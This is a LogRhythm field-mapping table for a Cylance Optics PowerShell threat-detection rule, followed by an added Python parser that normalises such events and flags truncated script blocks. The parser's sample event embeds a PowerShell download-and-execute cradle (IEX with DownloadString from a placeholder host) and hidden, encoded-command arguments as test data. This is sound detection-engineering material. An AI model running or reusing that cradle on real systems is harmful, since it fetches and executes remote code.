| Rule Name | Rule Type | Common Event | Classification |
|---|---|---|---|
| V 2.0 : Cylance Optics : Powershell Threat Detect | Base Rule | General Threat Message | Activity |
Mapping with LogRhythm Schema
| Device Key in Log Message | LogRhythm Schema | Data Type | Schema Description |
|---|---|---|---|
| Description | <policy> | Text/String | The name of the Detection Rule that was triggered. |
| Device ID | <serialnumber> | Text/String | The unique ID for the device. |
| Device Name | <dname> | Text/String | The name of the device on which the Detection Event occurred. |
| Event ID | N/A | N/A | The unique ID for the Detection Event. |
| Event Name | N/A | N/A | The name of the Detection Event. |
| Event Type | <vmid> | Text/String | The type of Detection Event (for example, that the event involved a Target File). |
| Instigating Process Image File Sha256 | <hash> | Text/String | The SHA256 hash of the process that instigated the action. |
| Instigating Process Name | <process> | Text/String | The name of the process that instigated the action. |
| Instigating Process Owner | <domainorigin>, <login> | Text/String | The user who owns the process that instigated the action; the domain portion is parsed into <domainorigin> and the user name into <login>. |
| Severity | <severity> | Text/String | The severity of the event: High (a malicious event that requires immediate attention), Medium (a suspicious event that should be reviewed), Low (an important event that may not be malicious), Info (an observed event). |
| Payload | N/A | N/A | The PowerShell modules and/or arguments that were passed to the PowerShell interpreter. |
| Payload Length | N/A | N/A | The length of the observed PowerShell Payload field. |
| Script Block Length | <size> | Number | The length of the observed PowerShell Script Block Text field. |
| Script Block Text | <command> | Text/String | The content of a PowerShell script or module that was loaded or executed by the PowerShell interpreter. |
| Zone Names | N/A | N/A | The zones to which the device belongs. |
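To show how the table is applied in practice, the following is an added example (not LogRhythm's MPE rule and not Cylance's code) that parses a constructed Cylance Optics PowerShell Threat Detect event into the schema fields above, splits Instigating Process Owner into <domainorigin> and <login>, and compares <size> against the captured <command> to flag a script block that was truncated in transit. The comma-separated "Key: Value" event layout, the sample values and the function names are assumptions made for illustration. Keys the table maps to N/A (Event ID, Event Name, Payload, Payload Length, Zone Names) are not promoted to schema fields, so an analyst who needs the Payload or Zone Names has to search the raw message text.

```python
"""Normalise a Cylance Optics "PowerShell Threat Detect" event into the
LogRhythm schema fields from the mapping table.

Added example; it is not LogRhythm's MPE rule or Cylance's own code.  The
event format assumed here (comma-separated "Key: Value" pairs) and the
sample events below are constructed for illustration.
"""
import re

# Device log key -> LogRhythm schema field(s), taken from the mapping table.
KEY_TO_SCHEMA = {
    "Description": "policy",
    "Device ID": "serialnumber",
    "Device Name": "dname",
    "Event Type": "vmid",
    "Instigating Process Image File Sha256": "hash",
    "Instigating Process Name": "process",
    "Instigating Process Owner": ("domainorigin", "login"),
    "Severity": "severity",
    "Script Block Length": "size",
    "Script Block Text": "command",
}
# Keys the table marks N/A: recognised so values can be delimited, but left
# in the raw event instead of being promoted to a schema field.
UNMAPPED_KEYS = ("Event ID", "Event Name", "Payload", "Payload Length", "Zone Names")
SEVERITIES = ("High", "Medium", "Low", "Info")

# Longest key first so "Payload Length" is tried before "Payload".  A key
# begins the message or follows ", " and is followed by ": "; a value runs
# to the next key, so commas or colons inside Script Block Text survive.
_ALL_KEYS = sorted(list(KEY_TO_SCHEMA) + list(UNMAPPED_KEYS), key=len, reverse=True)
_KEY_RE = re.compile(r"(?:^|, )(" + "|".join(map(re.escape, _ALL_KEYS)) + r"): ")


def parse_event(message: str) -> dict:
    """Split a raw event into {log key: value} using known keys as delimiters."""
    hits = list(_KEY_RE.finditer(message))
    fields = {}
    for i, hit in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(message)
        fields[hit.group(1)] = message[hit.end():end]
    return fields


def to_schema(fields: dict) -> dict:
    """Apply the table's mapping; only populated LogRhythm fields are returned."""
    schema = {}
    for key, target in KEY_TO_SCHEMA.items():
        if key not in fields:
            continue
        value = fields[key]
        if key == "Instigating Process Owner":
            # "DOMAIN\user" -> <domainorigin>, <login>; a bare name has no origin.
            domain, sep, user = value.rpartition("\\")
            schema["domainorigin"], schema["login"] = (domain, user) if sep else ("", value)
        elif key == "Script Block Length":
            schema["size"] = int(value)  # the table's only Number-typed field
        elif key == "Severity":
            if value not in SEVERITIES:
                raise ValueError(f"unexpected Severity {value!r}")
            schema["severity"] = value
        else:
            schema[target] = value
    return schema


def script_block_truncated(schema: dict) -> bool:
    """True when <size> reports more script text than <command> carries, which
    means the script block was cut (for example by a syslog length limit)
    somewhere between the sensor and the parser."""
    return schema.get("size", 0) > len(schema.get("command", ""))


# Constructed sample event (not real Cylance output); the hash is a placeholder.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a, b')"
HASH = "0123456789abcdef" * 4
SAMPLE = (
    "Description: Powershell Threat Detect, "
    "Device ID: 2f1c9e1a-0000-4000-8000-000000000001, Device Name: WS-0042, "
    "Event ID: e0f4c2b7-0000-4000-8000-000000000002, Event Name: ScriptBlock, "
    f"Event Type: PowerShellTrace, Instigating Process Image File Sha256: {HASH}, "
    "Instigating Process Name: powershell.exe, Instigating Process Owner: CORP\\jdoe, "
    "Severity: High, Payload: -nop -w hidden -enc SQBFAFgA, Payload Length: 28, "
    f"Script Block Length: {len(SCRIPT)}, Script Block Text: {SCRIPT}, "
    "Zone Names: Workstations"
)
# The same event cut off mid-script, as a syslog relay with a length cap would do.
SAMPLE_TRUNCATED = SAMPLE[: SAMPLE.index(SCRIPT) + 40]

if __name__ == "__main__":
    for raw in (SAMPLE, SAMPLE_TRUNCATED):
        parsed = to_schema(parse_event(raw))
        print(parsed, "truncated:", script_block_truncated(parsed))
```

Delimiting on the known key names rather than splitting on commas matters because Script Block Text is attacker-controlled and routinely contains ", " and ": "; a naive split would silently corrupt <command>, the one field the rule gives you to hunt on. The <size> versus <command> comparison is a cheap integrity check worth alerting on, since a truncated script block is exactly where the interesting part of a staged payload tends to be.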